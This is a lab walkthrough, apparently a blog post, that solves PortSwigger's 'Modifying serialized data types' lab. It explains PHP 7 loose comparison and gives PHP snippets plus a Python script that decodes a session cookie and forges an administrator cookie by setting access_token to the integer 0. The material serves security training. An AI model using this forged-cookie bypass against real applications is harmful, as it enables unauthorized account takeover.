PortSwigger Lab: Modifying serialized data types | WalkThrough

WraithOP
3 min read · Dec 31, 2021

Introduction

Today in this post I am going to share my walkthrough for the PortSwigger lab "Modifying serialized data types". The session cookie is a base64-encoded PHP serialized object. To become administrator we are going to change the data type of access_token from a string to the integer 0. When PHP 7 compares an integer with a string using ==, it converts the string to a number first, and a string with no leading digits becomes 0, so the comparison succeeds no matter what the real token is. This will let us become administrator and solve the lab.

Objective

This lab uses a serialization-based session mechanism and is vulnerable to authentication bypass as a result. To solve the lab, edit the serialized object in the session cookie to access the administrator account. Then, delete Carlos.

You can log in to your own account using the following credentials: wiener:peter

Detection

Log in with the given credentials wiener:peter.

We can see our session has been created.

After URL-decoding and base64-decoding the cookie we can see PHP serialization. I have created PHP code which deserializes the cookie.

<?php
// Base64-decoded value of the session cookie issued to wiener:
// an object of class User with two string properties
$strng = 'O:4:"User":2:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"a7e4j477ehhln5monacatdqudq8wvp7e";}';
$uns = unserialize($strng);
var_dump($uns);
?>

Exploitation

When PHP 7 compares an integer with a string using ==, it converts the string to a number based on its leading digits and ignores the rest of the string completely. Therefore 5 == "5 of something" is in practice treated as 5 == 5. A string with no leading digits at all, such as our access_token "a7e4j477...", converts to 0, so 0 == "a7e4j477ehhln5monacatdqudq8wvp7e" is true as well. That is why an integer 0 matches whatever token the server stores for the administrator. Note that PHP 8 changed this: a non-numeric string is now compared as a string against the integer, so 0 == "abc" is false and this trick only works against PHP 7 and earlier.

So we will change the username to administrator and the access_token to the integer 0.

<?php
// Forged object: username is now the 13-byte string "administrator" and
// access_token is the integer 0 instead of a 32-byte string
$strng = 'O:4:"User":2:{s:8:"username";s:13:"administrator";s:12:"access_token";i:0;}';
$uns = unserialize($strng);
// $uns is an object, so a single property is read with ->, not []:
// var_dump($uns->access_token);
var_dump($uns);
?>

s:13 means a string of 13 bytes, i.e. administrator. The length must match the string exactly or unserialize() rejects the whole object.

i:0 means an integer, here 0. Integers carry no length field.

To learn more about PHP deserialization, read this.

Base64-encode the payload, URL-encode it (the = padding becomes %3D), paste it in place of the session cookie value, then go to /admin and press Enter.

Now delete the user carlos to solve the lab.
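The following Python script is an added example, not the lab's code or the walkthrough author's, that does what the Detection and Exploitation sections describe end to end: it decodes the session cookie, parses the PHP-serialized User object, re-serializes it with username set to administrator and access_token set to the integer 0, and emulates PHP 7 and PHP 8 loose comparison to show why i:0 matches the real token only on PHP 7. The sample cookie is constructed from the serialized string shown above, the parser handles only the type tags the lab needs (i, b, s, O), and the assumption that the server checks the token with == is exactly the one the lab description makes.

```python
import base64
import re
import urllib.parse

# Constructed sample: base64 of the serialized User object the lab issued to wiener.
# The token is the one printed in the walkthrough; it is not a live credential.
SAMPLE_COOKIE = base64.b64encode(
    b'O:4:"User":2:{s:8:"username";s:6:"wiener";'
    b's:12:"access_token";s:32:"a7e4j477ehhln5monacatdqudq8wvp7e";}'
).decode()


def php_serialize(value):
    """Serialize int/bool/str, or a dict carrying a '__class__' key as a PHP object."""
    if isinstance(value, bool):
        return f"b:{int(value)};"
    if isinstance(value, int):
        return f"i:{value};"                      # integers have no length field
    if isinstance(value, str):
        return f's:{len(value.encode())}:"{value}";'   # s:N counts bytes, not chars
    if isinstance(value, dict):
        cls = value["__class__"]
        props = {k: v for k, v in value.items() if k != "__class__"}
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in props.items())
        return f'O:{len(cls)}:"{cls}":{len(props)}:{{{body}}}'
    raise TypeError(f"unsupported type {type(value).__name__}")


def _parse(s, i):
    """Parse one serialized value at offset i; return (value, offset after it)."""
    t = s[i]
    if t in "ib":
        end = s.index(";", i)
        raw = s[i + 2:end]
        return (int(raw) if t == "i" else raw == "1"), end + 1
    if t == "s":
        colon = s.index(":", i + 2)
        n = int(s[i + 2:colon])
        start = colon + 2                              # skip :"
        raw = s[start:].encode()[:n].decode()          # declared length is in bytes
        end = start + len(raw)
        if s[end:end + 2] != '";':
            raise ValueError(f"string length does not match at offset {i}")
        return raw, end + 2
    if t == "O":
        colon = s.index(":", i + 2)
        n = int(s[i + 2:colon])
        cls = s[colon + 2:colon + 2 + n]
        j = colon + 2 + n + 2                          # skip ":
        colon2 = s.index(":", j)
        count = int(s[j:colon2])
        j = colon2 + 2                                 # skip :{
        obj = {"__class__": cls}
        for _ in range(count):
            key, j = _parse(s, j)
            obj[key], j = _parse(s, j)
        if s[j] != "}":
            raise ValueError(f"object not closed at offset {i}")
        return obj, j + 1
    raise ValueError(f"unsupported type tag {t!r} at offset {i}")


def php_unserialize(s):
    value, end = _parse(s, 0)
    if end != len(s):
        raise ValueError("trailing data after serialized value")
    return value


def decode_cookie(cookie):
    """URL-decode then base64-decode a session cookie into its serialized text."""
    return base64.b64decode(urllib.parse.unquote(cookie)).decode()


def forge_admin_cookie(cookie):
    """Rewrite username to administrator and access_token to the integer 0."""
    user = php_unserialize(decode_cookie(cookie))
    user["username"] = "administrator"
    user["access_token"] = 0                           # i:0; replaces s:32:"..."
    raw = php_serialize(user).encode()
    # URL-encode so any '=' padding survives inside the Cookie header
    return urllib.parse.quote(base64.b64encode(raw).decode(), safe="")


_NUMERIC = re.compile(r"^\s*[+-]?(\d+\.?\d*|\.\d+)([eE][+-]?\d+)?\s*$")
_LEADING = re.compile(r"^\s*[+-]?(\d+\.?\d*|\.\d+)([eE][+-]?\d+)?")


def php_loose_eq(a, b, php_version=7):
    """Emulate PHP's == for the int-vs-string case the lab relies on.

    PHP 7: the string is converted to a number from its leading digits; a string
    with no leading digits becomes 0, so 0 == "abc" is true.
    PHP 8: only a fully numeric string is compared numerically; otherwise the int
    is cast to a string and compared as text, so 0 == "abc" is false.
    """
    if isinstance(a, str) and isinstance(b, int):
        a, b = b, a
    if isinstance(a, int) and isinstance(b, str):
        if php_version >= 8:
            if _NUMERIC.match(b):
                return float(a) == float(b)
            return str(a) == b
        m = _LEADING.match(b)
        return float(a) == (float(m.group(0)) if m else 0.0)
    return a == b


if __name__ == "__main__":
    token = php_unserialize(decode_cookie(SAMPLE_COOKIE))["access_token"]
    print("0 == token  PHP 7:", php_loose_eq(0, token, 7), " PHP 8:", php_loose_eq(0, token, 8))
    forged = forge_admin_cookie(SAMPLE_COOKIE)
    print(decode_cookie(forged))
    print("Cookie: session=" + forged)
```

Run it and paste the printed session value over the existing cookie before requesting /admin. The PHP 8 branch is there so you can see, before spending time on the request, whether the target's version makes this bypass viable at all.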
